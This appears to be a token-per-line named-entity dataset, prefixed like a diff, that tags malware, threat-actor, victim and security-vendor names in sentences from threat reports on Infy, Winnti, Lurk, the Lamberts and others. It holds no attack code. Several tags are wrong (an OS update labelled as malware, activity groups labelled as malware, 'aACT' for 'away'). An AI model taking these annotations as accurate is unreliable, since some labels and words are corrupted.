+Persia O
+" O
+, O
+in O
+which O
+we O
+described O
+the O
+discovery O
+of O
+a O
+decade-long O
+campaign O
+using O
+a O
+formerly O
+unknown O
+malware O
+family O
+, O
+Infy S-MAL
+, O
+that O
+targeted O
+government S-IDTY
+and O
+industry S-IDTY
+interests O
+worldwide O
+. O
+
+We O
+noted O
+in O
+our O
+original O
+blog O
+the O
+large O
+amount O
+of O
+targeting O
+of O
+Iranian S-LOC
+citizens S-IDTY
+in O
+this O
+campaign O
+, O
+we O
+observed O
+almost O
+one-third O
+of O
+all O
+victims O
+to O
+be O
+Iranian O
+. O
+
+In O
+addition O
+to O
+the O
+original O
+" O
+Infy S-MAL
+" O
+variant O
+, O
+we O
+also O
+see O
+the O
+newer O
+, O
+more O
+sophisticated O
+, O
+interactive O
+, O
+and O
+fuller-featured O
+" O
+Infy B-MAL
+M E-MAL
+" O
+variant O
+deployed O
+against O
+apparently-higher-value O
+targets O
+. O
+
+This O
+documentation O
+provides O
+new O
+insight O
+into O
+intrusion O
+efforts O
+conducted O
+by O
+at O
+least O
+four O
+discrete O
+Iranian B-LOC
+threat I-LOC
+actors E-LOC
+, O
+Rocket B-APT
+Kitten E-APT
+, O
+Infy S-APT
+, O
+Sima S-APT
+, O
+and O
+Operation B-ACT
+Cleaver E-ACT
+, O
+including O
+groups O
+and O
+tools O
+that O
+have O
+not O
+been O
+previously O
+disclosed O
+. O
+
+Since O
+early O
+2013 S-TIME
+, O
+we O
+have O
+observed O
+activity O
+from O
+a O
+unique O
+threat O
+actor O
+group O
+, O
+which O
+we O
+began O
+to O
+investigate O
+based O
+on O
+increased O
+activities S-ACT
+against O
+human O
+right O
+activists S-IDTY
+in O
+the O
+beginning O
+of O
+2015 S-TIME
+. O
+
+Over O
+the O
+course O
+of O
+three O
+years O
+of O
+observation O
+of O
+campaigns S-ACT
+targeting O
+civil B-IDTY
+society E-IDTY
+and O
+human B-IDTY
+rights I-IDTY
+organizations E-IDTY
+, O
+from O
+records O
+of O
+well O
+over O
+two O
+hundred O
+spearphishing S-ACT
+and O
+other O
+intrusion O
+attempts O
+against O
+individuals O
+inside O
+of O
+Iran S-LOC
+and O
+in O
+the O
+diaspora S-IDTY
+, O
+a O
+narrative O
+of O
+persistent O
+intrusion O
+efforts O
+emerges O
+. O
+
+Thanks O
+to O
+information O
+we O
+have O
+been O
+able O
+to O
+collect O
+during O
+the O
+course O
+of O
+our O
+research O
+, O
+such O
+as O
+characteristics O
+of O
+the O
+group O
+'s O
+malware O
+and O
+development O
+cycle O
+, O
+our O
+research O
+strongly O
+supports O
+the O
+claim O
+that O
+the O
+Infy B-APT
+group E-ACT
+is O
+of O
+Iranian B-LOC
+origin E-LOC
+and O
+potentially O
+connected O
+to O
+the O
+Iranian B-LOC
+state E-LOC
+. O
+
+Amongst O
+a O
+backdrop O
+of O
+other O
+incidents O
+, O
+Infy O
+became O
+one O
+of O
+the O
+most O
+frequently O
+observed O
+agents O
+for O
+attempted O
+malware B-ACT
+attacks E-ACT
+against O
+Iranian O
+civil B-IDTY
+society E-IDTY
+beginning O
+in O
+late B-TIME
+2014 E-TIME
+, O
+growing O
+in O
+use O
+up O
+to O
+the O
+February B-TIME
+2016 E-TIME
+parliamentary O
+election B-LOC
+in I-LOC
+Iran E-LOC
+. O
+
+Until O
+the O
+publication O
+of O
+the O
+Palo B-SECTEAM
+Alto E-SECTEAM
+report O
+, O
+the O
+developers O
+of O
+the O
+Infy S-MAL
+appeared O
+to O
+be O
+actively O
+updating O
+and O
+maintaining O
+the O
+codebase O
+, O
+and O
+new O
+releases O
+were O
+distributed O
+to O
+existing O
+, O
+as O
+well O
+as O
+new O
+, O
+targets O
+quite O
+regularly O
+. O
+
+Other O
+samples O
+were O
+found O
+bearing O
+a O
+compilation O
+time O
+as O
+early O
+as O
+June B-TIME
+2012 E-TIME
+and O
+version O
+00002 O
+. O
+
+Over O
+the O
+months O
+following O
+the O
+elections O
+, O
+the O
+accounts O
+of O
+Iranians S-IDTY
+that O
+had O
+been O
+compromised O
+by O
+the O
+actors O
+were O
+then O
+used O
+for O
+spreading O
+the O
+malware O
+. O
+
+When O
+activities S-ACT
+targeting O
+of O
+civil B-IDTY
+society E-IDTY
+subsided O
+, O
+the O
+actors O
+instead O
+appeared O
+to O
+have O
+focused O
+on O
+external O
+targets O
+, O
+such O
+a O
+series O
+of O
+attempts O
+to O
+spearphish S-ACT
+the O
+Danish O
+Ministry O
+of O
+Foreign O
+Affairs O
+. O
+
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+has O
+noted O
+and O
+described O
+the O
+differences O
+of O
+two O
+malware O
+agents O
+developed O
+in O
+parallel O
+, O
+with O
+commonalities O
+in O
+behavior O
+but O
+differing O
+functionalities O
+; O
+families O
+described O
+as O
+Infy S-MAL
+and O
+Infy B-MAL
+M. E-MAL
+Our O
+primary O
+observation O
+was O
+of O
+the O
+Infy S-MAL
+( O
+non-M S-MAL
+) O
+malware S-MAL
+, O
+which O
+primarily O
+functions O
+as O
+a O
+keylogger S-MAL
+for O
+the O
+collection O
+of O
+account O
+credentials O
+. O
+
+Our O
+observation O
+of O
+Infy O
+'s O
+campaigns S-ACT
+, O
+primarily O
+through O
+the O
+lens O
+of O
+spearphishing B-ACT
+attacks E-ACT
+against O
+Iranian O
+civil B-IDTY
+society E-IDTY
+and O
+media B-IDTY
+organizations E-IDTY
+, O
+indicates O
+a O
+wandering O
+focus O
+on O
+particular O
+demographics O
+on O
+a O
+strategic O
+basis O
+over O
+time O
+. O
+
+The O
+Infy S-MAL
+malware S-MAL
+was O
+seen O
+targeting O
+Iranians S-IDTY
+again O
+in O
+June B-TIME
+2015 E-TIME
+, O
+when O
+it O
+was O
+shared O
+with O
+researchers O
+after O
+being O
+sent O
+to O
+a O
+broadcast B-IDTY
+journalist E-IDTY
+at O
+BBC B-IDTY
+Persian E-IDTY
+with O
+a O
+generic O
+introduction O
+and O
+a O
+PowerPoint S-TOOL
+presentation O
+attached O
+titled O
+" O
+Nostalogy O
+" O
+( O
+sic O
+) O
+. O
+
+Based O
+on O
+information O
+collected O
+in O
+the O
+course O
+of O
+this O
+research O
+, O
+the O
+targets O
+and O
+victims O
+of O
+Infy O
+'s O
+campaigns S-ACT
+have O
+continued O
+to O
+be O
+strongly O
+aligned O
+with O
+Iran S-LOC
+'s O
+" O
+soft O
+war O
+" O
+agenda O
+, O
+internal O
+security O
+policies O
+, O
+and O
+regional O
+adversaries O
+of O
+the O
+hardline O
+establishment O
+of O
+the O
+Islamic B-LOC
+Republic I-LOC
+of I-LOC
+Iran E-LOC
+. O
+
+Until O
+late O
+December B-TIME
+2015 E-TIME
+, O
+in O
+nearly O
+every O
+Infy B-MAL
+message E-MAL
+documented O
+since O
+our O
+tracking O
+began O
+in O
+May B-TIME
+2013 E-TIME
+, O
+no O
+attempt O
+included O
+strong O
+tailoring O
+of O
+the O
+approach O
+, O
+often O
+not O
+even O
+including O
+an O
+email S-ACT
+body O
+, O
+instead O
+relying O
+on O
+cryptic O
+filenames O
+and O
+email S-ACT
+subjects O
+to O
+attract O
+interest O
+. O
+
+One O
+narrowly-targeted O
+spearphishing S-ACT
+from O
+Infy O
+was O
+sent O
+from O
+the O
+compromised O
+account O
+of O
+a O
+political B-IDTY
+activist E-IDTY
+promoting O
+participation O
+inside O
+of O
+Iran S-LOC
+, O
+claiming O
+to O
+be O
+a O
+set O
+of O
+images O
+of O
+a O
+British-Iranian S-IDTY
+dual O
+national O
+that O
+has O
+been O
+held O
+in O
+Evin O
+Prison O
+for O
+five O
+years O
+on O
+espionage O
+charges O
+. O
+
+As O
+in O
+the O
+past O
+, O
+these O
+messages O
+have O
+been O
+sent O
+accounts O
+believed O
+to O
+be O
+fake O
+and O
+accounts O
+compromised O
+by O
+Infy O
+, O
+including O
+Kurdish B-IDTY
+activists E-IDTY
+that O
+had O
+previously O
+been O
+compromised O
+by O
+the O
+Flying B-APT
+Kitten I-APT
+actor I-APT
+group E-APT
+. O
+
+The O
+actors O
+successfully O
+compromised O
+a O
+host O
+of O
+an O
+Saudi S-LOC
+government B-IDTY
+institutions E-IDTY
+on O
+January B-TIME
+17 E-TIME
+, O
+2016 S-TIME
+, O
+and O
+maintained O
+access O
+for O
+at O
+least O
+two O
+weeks O
+. O
+
+The O
+Infy B-APT
+group E-APT
+also O
+appears O
+to O
+engage O
+in O
+espionage B-ACT
+activities E-ACT
+against O
+foreign O
+governments S-IDTY
+and O
+businesses S-IDTY
+. O
+
+In O
+order O
+to O
+initially O
+compromise O
+the O
+designated O
+targets O
+, O
+Infy O
+typically O
+distributed O
+specifically-crafted O
+malicious B-ACT
+documents I-ACT
+containing E-ACT
+Infy S-MAL
+through O
+spearphishing B-ACT
+attacks E-ACT
+. O
+
+In O
+order O
+to O
+initially O
+compromise O
+the O
+designated O
+targets O
+, O
+the O
+attackers O
+typically O
+distributed O
+specifically-crafted O
+malicious B-ACT
+documents I-ACT
+containing E-ACT
+Infy S-MAL
+through O
+spearphishing B-ACT
+attacks E-ACT
+. O
+
+On O
+May B-TIME
+2 E-TIME
+, O
+2016 S-TIME
+, O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+published O
+the O
+report O
+" O
+Prince O
+of O
+Persia O
+" O
+, O
+which O
+provided O
+the O
+first O
+public O
+and O
+widely-reported O
+indication O
+of O
+Infy S-APT
+'s O
+activities S-ACT
+in O
+Iran S-LOC
+, O
+while O
+other O
+publications O
+either O
+refrained O
+from O
+making O
+the O
+association O
+or O
+were O
+not O
+openly O
+available O
+. O
+
+Prior O
+to O
+the O
+distribution O
+of O
+new O
+versions O
+of O
+the O
+agent O
+, O
+the O
+Infy S-MAL
+developers O
+appear O
+to O
+consistently O
+conduct O
+tests O
+from O
+local O
+hosts O
+, O
+which O
+indicates O
+that O
+the O
+control O
+and O
+maintenance O
+of O
+the O
+software O
+occurs O
+in O
+the O
+Khorasan O
+Razavi O
+province O
+of O
+Iran S-LOC
+, O
+potentially O
+in O
+the O
+city O
+of O
+Mashhad S-LOC
+. O
+
+On O
+May B-TIME
+2 E-TIME
+, O
+2016 S-TIME
+, O
+Palo B-SECTEAM
+Alto E-SECTEAM
+published O
+the O
+report O
+" O
+Prince O
+of O
+Persia O
+" O
+, O
+which O
+provided O
+the O
+first O
+public O
+and O
+widely-reported O
+indication O
+of O
+Infy O
+'s O
+activities S-ACT
+in O
+Iran S-LOC
+, O
+while O
+other O
+publications O
+either O
+refrained O
+from O
+making O
+the O
+association O
+or O
+were O
+not O
+openly O
+available O
+. O
+
+Only O
+one O
+client O
+, O
+based O
+in O
+Iran S-LOC
+, O
+continued O
+to O
+communicate O
+with O
+the O
+infrastructure O
+. O
+
+A O
+researcher O
+has O
+attributed O
+a O
+recently O
+publicized O
+attack O
+on O
+Citrix' S-IDTY
+internal O
+network O
+to O
+the O
+Iranian-linked B-LOC
+group E-LOC
+known O
+as O
+IRIDIUM O
+– O
+and O
+said O
+that O
+the O
+data O
+heist O
+involved O
+6 O
+terabytes O
+of O
+sensitive O
+data O
+. O
+
+" O
+IRIDIUM O
+has O
+hit O
+more O
+than O
+200 O
+government B-IDTY
+agencies E-IDTY
+, O
+oil S-IDTY
+and O
+gas B-IDTY
+companies E-IDTY
+and O
+technology B-IDTY
+companies E-IDTY
+, O
+including O
+Citrix B-IDTY
+Systems I-IDTY
+Inc E-IDTY
+" O
+, O
+they O
+said O
+. O
+
+Citrix S-IDTY
+told O
+Threatpost O
+that O
+this O
+is O
+indeed O
+the O
+same O
+password-spraying B-ACT
+attack E-ACT
+it O
+announced O
+itself O
+last O
+week O
+– O
+but O
+it O
+wouldn't O
+confirm O
+the O
+other O
+details O
+in O
+Resecurity S-SECTEAM
+'s O
+post O
+, O
+including O
+the O
+attribution O
+. O
+
+In O
+wake O
+of O
+these O
+events O
+, O
+a O
+security B-IDTY
+firm E-IDTY
+Resecurity S-SECTEAM
+reached O
+out O
+to O
+NBC O
+news O
+and O
+claimed O
+that O
+they O
+had O
+reasons O
+to O
+believe O
+that O
+the O
+attacks O
+were O
+carried O
+out O
+by O
+Iranian-linked B-LOC
+group E-LOC
+known O
+as O
+IRIDIUM O
+. O
+
+Resecurity S-SECTEAM
+says O
+that O
+IRIDIUM O
+" O
+has O
+hit O
+more O
+than O
+200 O
+government B-IDTY
+agencies E-IDTY
+, O
+oil S-IDTY
+and O
+gas B-IDTY
+companies E-IDTY
+, O
+and O
+technology B-IDTY
+companies E-IDTY
+including O
+Citrix S-IDTY
+. O
+
+Resecurity S-SECTEAM
+claims O
+that O
+IRIDIUM O
+breached O
+Citrix S-IDTY
+'s O
+network O
+during O
+December B-TIME
+2018 E-TIME
+. O
+
+Infy S-MAL
+engaged O
+in O
+malware O
+spearphishing S-ACT
+against O
+the O
+same O
+targets O
+as O
+Flying O
+Kitten O
+from O
+the O
+outset O
+of O
+its O
+campaign O
+; O
+Operation B-ACT
+Cleaver E-ACT
+has O
+registered O
+several O
+resources O
+related O
+to O
+development B-IDTY
+agencies E-IDTY
+that O
+have O
+been O
+the O
+subject O
+of O
+intrusion O
+attempts O
+by O
+others O
+since O
+February B-TIME
+2014 E-TIME
+. O
+
+The O
+malicious O
+samples O
+we O
+found O
+are O
+the O
+early O
+stage O
+malware O
+most O
+often O
+delivered O
+by O
+spear-phishing S-ACT
+e-mails E-ACT
+. O
+
+This O
+next O
+stage O
+library O
+copies O
+itself O
+into O
+the O
+System32 O
+directory O
+of O
+the O
+Windows S-OS
+folder O
+after O
+the O
+hardcoded O
+file O
+name O
+— O
+either O
+KBDLV2.DLL S-FILE
+or O
+AUTO.DLL S-FILE
+, O
+depending O
+on O
+the O
+malware O
+sample O
+. O
+
+At O
+this O
+stage O
+, O
+the O
+malware O
+gathers O
+information O
+about O
+the O
+infected O
+computer O
+. O
+
+Hancom O
+Office O
+is O
+widely O
+used O
+in O
+South S-LOC
+Korea S-LOC
+. O
+
+Perhaps O
+it O
+also O
+points O
+to O
+the O
+suspected O
+North B-LOC
+Korean E-LOC
+origin O
+of O
+attack O
+. O
+
+The O
+attacker O
+is O
+from O
+North B-LOC
+Korea E-LOC
+. O
+
+All O
+of O
+them O
+lie B-ACT
+in I-ACT
+ranges E-ACT
+of O
+the O
+Jilin B-LOC
+Province I-LOC
+Network E-LOC
+and O
+Liaoning B-LOC
+Province I-LOC
+Network E-LOC
+, O
+in O
+China S-LOC
+. O
+
+Finally O
+, O
+this O
+geo-location O
+supports O
+the O
+likely O
+theory O
+that O
+the O
+attackers O
+behind O
+Kimsuky S-APT
+are O
+based O
+in O
+North B-LOC
+Korea E-LOC
+. O
+
+In O
+this O
+blog O
+, O
+we O
+look O
+at O
+the O
+Winnti S-MAL
+malware S-MAL
+implant O
+as O
+used O
+by O
+two O
+known O
+activity O
+groups O
+BARIUM S-APT
+and O
+LEAD O
+. O
+
+According O
+to O
+the O
+German S-LOC
+press O
+, O
+the O
+intruders O
+used O
+the O
+Winnti B-MAL
+family I-MAL
+of I-MAL
+malware E-MAL
+as O
+their O
+main O
+implant O
+, O
+giving O
+them O
+persistent O
+access O
+to O
+the O
+conglomerate O
+'s O
+network O
+as O
+early O
+as O
+February B-TIME
+2016 E-TIME
+. O
+
+In O
+the O
+case O
+of O
+this O
+malware O
+, O
+the O
+activity O
+groups O
+strongly O
+associated O
+with O
+Winnti S-MAL
+are O
+BARIUM S-MAL
+and O
+LEAD S-MAL
+. O
+
+But O
+even O
+though O
+they O
+share O
+the O
+use O
+of O
+Winnti S-MAL
+, O
+the O
+BARIUM S-MAL
+and O
+LEAD S-MAL
+activity O
+groups O
+are O
+involved O
+in O
+very O
+different O
+intrusion O
+scenarios O
+. O
+
+To O
+show O
+how O
+this O
+breach O
+and O
+similar O
+breaches O
+can O
+be O
+mitigated O
+, O
+we O
+look O
+at O
+how O
+Windows B-SECTEAM
+Defender I-SECTEAM
+ATP E-SECTEAM
+flags O
+activities S-ACT
+associated O
+with O
+BARIUM S-ACT
+, O
+LEAD S-ACT
+, O
+and O
+other O
+known O
+activity O
+groups O
+and O
+how O
+it O
+provides O
+extensive O
+threat O
+intelligence O
+about O
+these O
+groups O
+. O
+
+BARIUM S-ACT
+begins O
+its O
+attacks O
+by O
+cultivating O
+relationships O
+with O
+potential O
+victims—particularly O
+those O
+working O
+in O
+Business O
+Development O
+or O
+Human O
+Resources—on O
+various O
+social B-IDTY
+media E-IDTY
+platforms O
+. O
+
+During O
+these O
+intrusions O
+, O
+LEAD O
+'s O
+objective O
+was O
+to O
+steal O
+sensitive O
+data O
+, O
+including O
+research O
+materials O
+, O
+process O
+documents O
+, O
+and O
+project O
+plans O
+. O
+
+Initial O
+intrusion O
+stages O
+feature O
+the O
+Win32/Barlaiy S-MAL
+implant—notable O
+for O
+its O
+use O
+of O
+social O
+network O
+profiles O
+, O
+collaborative O
+document O
+editing O
+sites O
+, O
+and O
+blogs O
+for O
+C&C S-TOOL
+. O
+
+Once O
+BARIUM S-ACT
+has O
+established O
+rapport O
+, O
+they O
+spear-phish S-ACT
+the O
+victim O
+using O
+a O
+variety O
+of O
+unsophisticated O
+malware S-MAL
+installation O
+vectors O
+, O
+including O
+malicious O
+shortcut O
+( O
+.lnk S-FILE
+) O
+files O
+with O
+hidden O
+payloads O
+. O
+
+Instead O
+, O
+the O
+group O
+often O
+simply O
+emails S-TOOL
+a O
+Winnti B-MAL
+installer E-MAL
+to O
+potential O
+victims O
+, O
+relying O
+on O
+basic O
+social B-ACT
+engineering I-ACT
+tactics E-ACT
+to O
+convince O
+recipients O
+to O
+run O
+the O
+attached O
+malware O
+. O
+
+Microsoft B-SECTEAM
+Analytics E-SECTEAM
+shows O
+that O
+Winnti S-MAL
+has O
+been O
+used O
+in O
+intrusions O
+carried O
+out O
+throughout O
+Asia S-LOC
+, O
+Europe S-LOC
+, O
+Oceania S-LOC
+, O
+the O
+Middle B-LOC
+East E-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+in O
+the O
+last O
+six O
+months O
+( O
+Figure O
+1 O
+) O
+. O
+
+Instead O
+, O
+Lead O
+often O
+simply O
+emails S-TOOL
+a O
+Winnti B-MAL
+installer E-MAL
+to O
+potential O
+victims O
+, O
+relying O
+on O
+basic O
+social B-ACT
+engineering I-ACT
+tactics E-ACT
+to O
+convince O
+recipients O
+to O
+run O
+the O
+attached O
+malware O
+. O
+
+In O
+some O
+other O
+cases O
+, O
+LEAD O
+gains O
+access O
+to O
+a O
+target O
+by O
+brute-forcing O
+remote O
+access O
+login O
+credentials O
+, O
+performing O
+SQL O
+injection O
+, O
+or O
+exploiting O
+unpatched O
+web O
+servers O
+, O
+and O
+then O
+they O
+copy O
+the O
+Winnti B-MAL
+installer E-MAL
+directly O
+to O
+compromised O
+machines O
+. O
+
+This O
+was O
+the O
+case O
+in O
+two O
+known O
+intrusions O
+in O
+2015 S-TIME
+, O
+where O
+attackers O
+named O
+the O
+implant O
+DLL S-TOOL
+" O
+ASPNET_FILTER.DLL S-FILE
+" O
+to O
+disguise O
+it O
+as O
+the O
+DLL S-TOOL
+for O
+the O
+ASP.NET B-FILE
+ISAPI I-FILE
+Filter E-FILE
+. O
+
+Windows B-SECTEAM
+Defender I-SECTEAM
+ATP E-SECTEAM
+helps O
+network O
+security O
+professionals O
+deal O
+with O
+intrusions O
+from O
+activity O
+groups O
+like O
+LEAD S-MAL
+and O
+BARIUM S-MAL
+in O
+several O
+ACTs O
+. O
+
+The O
+following O
+examples O
+were O
+developed O
+using O
+a O
+Winnti B-MAL
+installer E-MAL
+that O
+was O
+used O
+in O
+attacks O
+in O
+December B-TIME
+2016 E-TIME
+. O
+
+The O
+Windows B-MAL
+10 I-MAL
+Creators I-MAL
+Update E-MAL
+will O
+bring O
+several O
+enhancements O
+to O
+Windows B-SECTEAM
+Defender I-SECTEAM
+ATP E-SECTEAM
+that O
+will O
+provide O
+SOC B-IDTY
+personnel E-IDTY
+with O
+options O
+for O
+immediate O
+mitigation O
+of O
+a O
+detected O
+threat O
+. O
+
+LEAD O
+and O
+Barium S-APT
+are O
+not O
+known O
+for O
+large-scale O
+spear-phishing S-ACT
+, O
+so O
+it O
+is O
+unlikely O
+that O
+SOC B-IDTY
+personnel E-IDTY
+would O
+have O
+to O
+deal O
+with O
+multiple O
+machines O
+having O
+been O
+compromised O
+by O
+these O
+groups O
+at O
+the O
+same O
+time O
+. O
+
+And O
+, O
+finally O
+, O
+with O
+the O
+upcoming O
+Creators B-MAL
+Update E-MAL
+, O
+Windows B-SECTEAM
+Defender I-SECTEAM
+ATP E-SECTEAM
+will O
+provide O
+additional O
+capabilities O
+for O
+detecting O
+threats O
+such O
+as O
+Winnti S-MAL
+, O
+as O
+well O
+as O
+centralized O
+response O
+options O
+, O
+such O
+as O
+machine O
+isolation O
+and O
+file O
+blocking O
+, O
+that O
+will O
+enable O
+fast O
+containment O
+of O
+known O
+attack O
+jump O
+off O
+points O
+. O
+
+The O
+police O
+suspected O
+Lurk S-MAL
+of O
+stealing O
+nearly O
+three O
+billion O
+rubles O
+, O
+using O
+malicious O
+software O
+to O
+systematically O
+withdraw O
+large O
+sums O
+of O
+money O
+from O
+the O
+accounts O
+of O
+commercial B-IDTY
+organizations E-IDTY
+, O
+including O
+banks S-IDTY
+. O
+
+When O
+we O
+first O
+encountered O
+Lurk S-MAL
+, O
+in O
+2011 S-TIME
+, O
+it O
+was O
+a O
+nameless O
+Trojan S-MAL
+. O
+
+While O
+the O
+machine O
+is O
+in O
+isolation O
+, O
+SOC B-IDTY
+personnel E-IDTY
+can O
+direct O
+the O
+infected O
+machine O
+to O
+collect O
+live O
+investigation O
+data O
+, O
+such O
+as O
+the O
+DNS S-PROT
+cache O
+or O
+security O
+event O
+logs O
+, O
+which O
+they O
+can O
+use O
+to O
+verify O
+alerts O
+, O
+assess O
+the O
+state O
+of O
+the O
+intrusion O
+, O
+and O
+support O
+follow-up O
+actions O
+. O
+
+This O
+article O
+is O
+an O
+attempt O
+to O
+share O
+this O
+experience O
+with O
+other O
+experts O
+, O
+particularly O
+the O
+IT S-IDTY
+security O
+specialists O
+in O
+companies O
+and O
+financial B-IDTY
+institutions E-IDTY
+that O
+increasingly O
+find O
+themselves O
+the O
+targets O
+of O
+cyber-attacks O
+. O
+
+In O
+most O
+cases O
+, O
+the O
+attackers O
+only O
+had O
+to O
+infect O
+the O
+computer O
+on O
+which O
+the O
+RBS O
+software O
+was O
+installed O
+in O
+order O
+to O
+start O
+stealing O
+the O
+cash O
+. O
+
+We O
+were O
+soon O
+able O
+to O
+help O
+investigate O
+another O
+incident O
+involving O
+Lurk S-MAL
+. O
+
+This O
+event O
+significantly O
+affected O
+the O
+Russian B-LOC
+cybercriminal E-LOC
+world O
+as O
+the O
+gang O
+had O
+stolen O
+hundreds O
+of O
+millions O
+of O
+rubles O
+during O
+a O
+few O
+years O
+of O
+activity O
+, O
+and O
+was O
+considered O
+a O
+" O
+leader O
+" O
+among O
+cybercriminals O
+. O
+
+In O
+Russia O
+, O
+there O
+were O
+several O
+relatively O
+large O
+cybercriminal O
+groups O
+engaged O
+in O
+financial O
+theft O
+via O
+attacks O
+on O
+RBS O
+. O
+
+In O
+April B-TIME
+2013 E-TIME
+, O
+a O
+year O
+after O
+we O
+found O
+the O
+" O
+bodiless O
+" O
+Lurk B-MAL
+module E-MAL
+, O
+the O
+Russian O
+cybercriminal O
+underground O
+exploited O
+several O
+families O
+of O
+malicious O
+software O
+that O
+specialized O
+in O
+attacks O
+on O
+banking O
+software O
+. O
+
+Through O
+the O
+information O
+exchanges O
+used O
+by O
+people O
+in O
+the O
+security B-IDTY
+industry E-IDTY
+, O
+we O
+learned O
+that O
+several O
+Russian O
+banks S-IDTY
+were O
+struggling O
+with O
+malicious O
+programs O
+created O
+specifically O
+to O
+attack O
+a O
+particular O
+type O
+of O
+legal O
+banking O
+software O
+. O
+
+If O
+it O
+did O
+, O
+the O
+malware O
+downloaded O
+additional O
+modules O
+, O
+including O
+ones O
+allowing O
+for O
+the O
+automatic O
+creation O
+of O
+unauthorized O
+payment O
+orders O
+, O
+changing O
+details O
+in O
+legal O
+payment O
+orders O
+, O
+etc O
+. O
+
+As O
+far O
+as O
+we O
+can O
+judge O
+from O
+the O
+data O
+we O
+have O
+, O
+in O
+2014 S-TIME
+the O
+criminal O
+group O
+behind O
+Lurk S-MAL
+seriously O
+reduced O
+its O
+activity O
+and O
+" O
+lived O
+from O
+hand O
+to O
+mouth O
+" O
+, O
+attacking O
+anyone O
+they O
+could O
+, O
+including O
+ordinary O
+users O
+. O
+
+In O
+February B-TIME
+2015 E-TIME
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+Global O
+Research O
+and O
+Analysis O
+Team O
+( O
+GReAT S-SECTEAM
+) O
+released O
+its O
+research O
+into O
+the O
+Carbanak B-ACT
+campaign E-ACT
+targeting O
+financial B-IDTY
+institutions E-IDTY
+. O
+
+Since O
+2011 S-TIME
+, O
+the O
+robbers O
+had O
+allegedly O
+been O
+stealing O
+money O
+directly O
+from O
+bank O
+accounts O
+in O
+Russia S-LOC
+and O
+other O
+countries O
+of O
+the O
+Commonwealth O
+of O
+Independent O
+States O
+( O
+CIS O
+) O
+by O
+using O
+a O
+Trojan S-MAL
+called O
+Lurk S-MAL
+. O
+
+which O
+they O
+launched O
+targeted B-ACT
+attacks E-ACT
+against O
+Russian S-LOC
+banks S-IDTY
+, O
+businesses S-IDTY
+and O
+media B-IDTY
+companies E-IDTY
+. O
+
+Lurk S-MAL
+uses O
+a O
+form O
+of O
+steganography O
+: O
+that's O
+where O
+one O
+file O
+is O
+hidden O
+aACT O
+inside O
+another O
+file O
+of O
+a O
+completely O
+different O
+sort O
+, O
+such O
+as O
+an O
+image O
+, O
+audio O
+, O
+or O
+video O
+file O
+. O
+
+The O
+latest O
+version O
+of O
+Madi O
+also O
+has O
+the O
+ability O
+to O
+monitor O
+the O
+Russian S-LOC
+social O
+network O
+Vkontakte O
+( O
+VK O
+) O
+along O
+with O
+the O
+Jabber O
+messaging O
+platform O
+to O
+look O
+for O
+users O
+who O
+visit O
+websites O
+that O
+contain O
+words O
+like O
+" O
+USA O
+" O
+, O
+" O
+Skype O
+" O
+, O
+and O
+" O
+gov O
+" O
+. O
+
+Madi O
+was O
+found O
+capturing O
+computer O
+screens O
+, O
+recording O
+audio O
+and O
+stealing O
+screenshots O
+, O
+keystrokes O
+, O
+documents O
+and O
+e-mail S-TOOL
+correspondence O
+from O
+" O
+Middle O
+Eastern O
+critical B-IDTY
+infrastructure I-IDTY
+engineering I-IDTY
+firms E-IDTY
+, O
+government B-IDTY
+agencies E-IDTY
+, O
+financial B-IDTY
+houses E-IDTY
+and O
+academia S-IDTY
+. O
+
+A O
+timeline O
+of O
+new O
+activity O
+can O
+be O
+scoped O
+out O
+for O
+the O
+group O
+, O
+with O
+the O
+greatest O
+number O
+of O
+related O
+downloaders O
+created O
+by O
+the O
+developers O
+in O
+December B-TIME
+2011 E-TIME
+, O
+Feb S-TIME
+and O
+March B-TIME
+of I-TIME
+2012 E-TIME
+, O
+followed O
+by O
+June B-TIME
+of I-TIME
+2012 E-TIME
+. O
+
+it O
+reports O
+to O
+was O
+created O
+on O
+August B-TIME
+10 E-TIME
+, O
+2011 S-TIME
+. O
+
+Since O
+at O
+least O
+2008 S-TIME
+, O
+The O
+Lamberts S-MAL
+have O
+used O
+multiple O
+sophisticated O
+attack O
+tools O
+against O
+high-profile O
+victims O
+. O
+
+Longhorn O
+, O
+which O
+we O
+internally O
+refer O
+to O
+as O
+" O
+The B-APT
+Lamberts E-APT
+" O
+, O
+first O
+came O
+to O
+the O
+attention O
+of O
+the O
+ITSec B-SECTEAM
+community E-SECTEAM
+in O
+2014 S-TIME
+, O
+when O
+our O
+colleagues O
+from O
+FireEye S-SECTEAM
+discovered O
+an O
+attack O
+using O
+a O
+zero B-VULNAME
+day E-VULNAME
+vulnerability S-VULNAME
+( O
+CVE-2014-4148 S-VULID
+) O
+. O
+
+The O
+attack O
+leveraged O
+malware O
+we O
+called O
+' O
+BlackLambert S-MAL
+' O
+, O
+which O
+was O
+used O
+to O
+target O
+a O
+high B-IDTY
+profile I-IDTY
+organization E-IDTY
+in O
+Europe S-LOC
+. O
+
+Their O
+arsenal O
+includes O
+network-driven B-MAL
+backdoors E-MAL
+, O
+several O
+generations O
+of O
+modular B-MAL
+backdoors E-MAL
+, O
+harvesting B-MAL
+tools E-MAL
+, O
+and O
+wipers S-MAL
+. O
+
+The O
+first O
+time O
+the O
+Lambert B-MAL
+family I-MAL
+malware E-MAL
+was O
+uncovered O
+publicly O
+was O
+in O
+October B-TIME
+2014 E-TIME
+, O
+when O
+FireEye S-SECTEAM
+posted O
+a O
+blog O
+about O
+a O
+zero B-VULNAME
+day E-VULNAME
+exploit S-VULNAME
+( O
+CVE-2014-4148 S-VULID
+) O
+used O
+in O
+the O
+wild O
+. O
+
+Interestingly O
+, O
+while O
+most O
+Blue B-MAL
+Lambert E-MAL
+variants O
+have O
+version O
+numbers O
+in O
+the O
+range O
+of O
+2.x O
+, O
+Green B-MAL
+Lambert E-MAL
+is O
+mostly O
+in O
+3.x O
+versions O
+. O
+
+While O
+investigating O
+one O
+of O
+these O
+infections O
+involving O
+White B-MAL
+Lambert E-MAL
+( O
+network-driven O
+implant O
+) O
+and O
+Blue B-MAL
+Lambert E-MAL
+( O
+active O
+implant O
+) O
+, O
+we O
+found O
+yet O
+another O
+family O
+of O
+tools O
+that O
+appear O
+to O
+be O
+related O
+. O
+
+Versions O
+of O
+this O
+particular O
+orchestrator O
+were O
+found O
+on O
+other O
+victims O
+, O
+together O
+with O
+White B-MAL
+Lambert I-MAL
